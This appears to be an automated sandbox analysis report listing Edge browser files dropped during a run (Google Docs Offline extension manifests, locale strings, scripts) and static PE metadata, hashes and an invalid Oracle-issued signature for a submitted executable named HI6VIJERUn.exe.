                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11406
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                        MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                        SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                        SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                        SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                        MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                        SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                        SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                        SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):122218
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                        MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                        SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                        SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                        SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):130866
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                        MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                        SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                        SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                        SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9874842801870445
                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                        File name:HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File size:1'374'325 bytes
                                                                                                                                                                                                                                                                                                        MD5:3da674c87aa02f410b79109a2e5b1448
                                                                                                                                                                                                                                                                                                        SHA1:a108a3d031e70a8bc706c376115ee9f3aac91508
                                                                                                                                                                                                                                                                                                        SHA256:7f714d1fe31c0e0b58f6e98c86717c8e62dcf722513de35d25e9f31330d4027f
                                                                                                                                                                                                                                                                                                        SHA512:439396acee5012c5d1cc36bc74bbf9d1f0fe726f3f8186f66c36f4a06211d297c9d04df3247c651829cdae1dadd26a3c71c9bf75be5ad957c96a99084806f1ab
                                                                                                                                                                                                                                                                                                        SSDEEP:24576:zirwZY28AKkIJR+8O/rzY7khXyjmHWGU+tq9ljNypL5uUZg:E0Y1XzJkl/rCrdGU2CjQl5uUq
                                                                                                                                                                                                                                                                                                        TLSH:A25533818A3028FBFC754671BAF19906E7765C24BC31E2994331DAED96B67036174B33
                                                                                                                                                                                                                                                                                                        Icon Hash:1ee3c3e6ccd8d2c0
                                                                                                                                                                                                                                                                                                        Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                        Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                                                                        • 18/08/2021 20:00:00 19/08/2023 19:59:59
                                                                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                                                                        • CN="Oracle America, Inc.", OU=Software Engineering, O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                                                                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                                                                        Thumbprint MD5:2876C1BECB51837D0E3DE50903D025B6
                                                                                                                                                                                                                                                                                                        Thumbprint SHA-1:940D69C0A34A1B4CFD8048488BA86F4CED60481A
                                                                                                                                                                                                                                                                                                        Thumbprint SHA-256:EE46613A38B4F486164BCE7FB23178667715617F511B364594311A1548B08EB1
                                                                                                                                                                                                                                                                                                        Serial:068BE2F53452C882F18ED41A5DD4E7A3
                                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                                                                                                        xor ebp, ebp
                                                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                                                                                                        call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EB98h], eax
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x181e | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x14d9ad | 0x1ec8 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x100000 | 0x181e | 0x1a00 | bdaad36f3f344f3a0e550a11d26c2972 | False | 0.5489783653846154 | data | 5.332718850937346 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x102000 | 0xfd6 | 0x1000 | 8410ec9c3503078c8e9f905a211b76d2 | False | 0.59814453125 | data | 5.584220696917643 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x100190 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.6286429872495446 |
| RT_DIALOG | 0x1012b8 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x1013b8 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x1014d4 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x101534 | 0x14 | data | English | United States | 1.05 |
| RT_MANIFEST | 0x101548 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |

| DLL | Import |
|---|---|
